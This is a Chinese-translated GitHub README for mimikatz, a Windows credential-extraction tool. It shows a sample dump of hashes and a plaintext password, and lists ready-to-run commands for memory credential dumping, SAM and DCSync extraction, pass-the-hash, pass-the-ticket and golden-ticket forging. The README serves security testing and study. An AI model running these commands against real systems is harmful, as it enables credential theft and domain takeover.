gentilkiwi/mimikatz

GitHub: gentilkiwi/mimikatz

Windows 凭证提取与 Kerberos 攻击的标志性安全工具,支持从内存中抓取密码、哈希、票据并执行多种域内横向移动技术。

Stars: 21309 | Forks: 4035

# mimikatz **`mimikatz`** 是我制作的一个工具,用于学习 `C` 语言并在 Windows 安全方面进行一些实验。 它现在以从内存中提取明文密码、哈希、PIN 码和 kerberos 票据而闻名。**`mimikatz`** 还可以执行 pass-the-hash、pass-the-ticket 或构建 _Golden tickets_。 ``` .#####. mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr 6 2014 22:02:03) .## ^ ##. ## / \ ## /* * * ## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) '## v ##' https://blog.gentilkiwi.com/mimikatz (oe.eo) '#####' with 13 modules * * */ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::logonpasswords Authentication Id : 0 ; 515764 (00000000:0007deb4) Session : Interactive from 2 User Name : Gentil Kiwi Domain : vm-w7-ult-x SID : S-1-5-21-1982681256-1210654043-1600862990-1000 msv : [00000003] Primary * Username : Gentil Kiwi * Domain : vm-w7-ult-x * LM : d0e9aee149655a6075e4540af1f22d3b * NTLM : cc36cf7a8514893efccd332446158b1a * SHA1 : a299912f3dc7cf0023aef8e4361abfc03e9a8c30 tspkg : * Username : Gentil Kiwi * Domain : vm-w7-ult-x * Password : waza1234/ ... ``` 但这还不是全部!`Crypto`、`Terminal Server`、`Events`……GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki 或 https://blog.gentilkiwi.com 上有大量信息(法语,_是的_)。 如果你不想自己构建,可以在此处获取二进制文件 https://github.com/gentilkiwi/mimikatz/releases ## 快速使用 ``` log privilege::debug ``` ### sekurlsa ``` sekurlsa::logonpasswords sekurlsa::tickets /export sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd ``` ### kerberos ``` kerberos::list /export kerberos::ptt c:\chocolate.kirbi kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi ``` ### crypto ``` crypto::capi crypto::cng crypto::certificates /export crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::keys /export crypto::keys /machine /export ``` ### vault & lsadump ``` vault::cred vault::list token::elevate vault::cred vault::list lsadump::sam lsadump::secrets lsadump::cache token::revert lsadump::dcsync /user:domain\krbtgt /domain:lab.local ``` ## 构建 `mimikatz` 采用 Visual Studio Solution 和 WinDDK 驱动程序的形式(主要操作可选),因此先决条件为: * 对于 `mimikatz` 和 `mimilib`:用于 Desktop 的 Visual Studio 2010、2012 或 2013(**2013 Express for Desktop 是免费的,且支持 x86 和 x64** - http://www.microsoft.com/download/details.aspx?id=44914) * _对于 `mimikatz driver`、`mimilove`(以及 `ddk2003` 平台):Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800_ `mimikatz` 使用 `SVN` 进行源代码控制,但现在也支持 `GIT`! 你可以使用任何你喜欢的工具进行同步,甚至是 Visual Studio 2013 中内置的 `GIT` =) ### 同步! * GIT URL 为 : https://github.com/gentilkiwi/mimikatz.git * SVN URL 为 : https://github.com/gentilkiwi/mimikatz/trunk * ZIP 文件为 : https://github.com/gentilkiwi/mimikatz/archive/master.zip ### 构建解决方案 * 打开解决方案后,`Build` / `Build Solution`(你可以更改架构) * `mimikatz` 现已构建完成,随时可以使用!(`Win32` / `x64`,如果你运气好的话甚至支持 `ARM64`) * 你可能会遇到关于 `_build_.cmd` 和 `mimidrv` 的 `MSB3073` 错误,这是因为如果没有 Windows Driver Kit **7.1** (WinDDK) 就无法构建驱动程序,但 `mimikatz` 和 `mimilib` 是没问题的。 ### ddk2003 通过这个可选的 MSBuild 平台,你可以使用 WinDDK 构建工具和默认的 `msvcrt` 运行时(二进制文件更小,无依赖项) 对于这个可选平台,Windows Driver Kit **7.1** (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 和 Visual Studio **2010** 是必须的,即使你计划之后使用 Visual Studio 2012 或 2013。 请遵循以下说明: * https://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme * _https://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader_ ## 持续集成 `mimikatz` 项目可在 AppVeyor 上找到 - https://ci.appveyor.com/project/gentilkiwi/mimikatz 其状态为:![AppVeyor CI status](https://ci.appveyor.com/api/projects/status/github/gentilkiwi/mimikatz?svg=true&retina=true) ## 许可证 CC BY 4.0 许可证 - https://creativecommons.org/licenses/by/4.0/ `mimikatz` 的开发需要咖啡支持: * PayPal: https://www.paypal.me/delpy/ ## 作者 * Benjamin DELPY `gentilkiwi`,你可以在 Twitter ( @gentilkiwi ) 上联系我,或通过邮件 ( benjamin [at] gentilkiwi.com ) * `lsadump` 模块中的 DCSync 和 DCShadow 功能是与 Vincent LE TOUX 合写的,你可以通过邮件 ( vincent.letoux [at] gmail.com ) 联系他或访问他的网站 ( http://www.mysmartlogon.com ) 这是一个**个人**开发项目,请尊重其理念,不要将其用于坏事!
标签:Conpot, CTF学习, CTF工具, HTTP, Kerberos攻击, LSASS内存, Mimikatz, Modbus, SCADA, Windows内核, Windows安全, 内网渗透, 凭据转储, 协议分析, 哈希传递, 客户端加密, 客户端加密, 密码提取, 攻击路径可视化, 权限提升, 模拟器, 横向移动, 漏洞搜索, 白帽子, 票据传递, 端点可见性, 编程规范, 网络安全, 隐私保护, 黄金票据, 黑客工具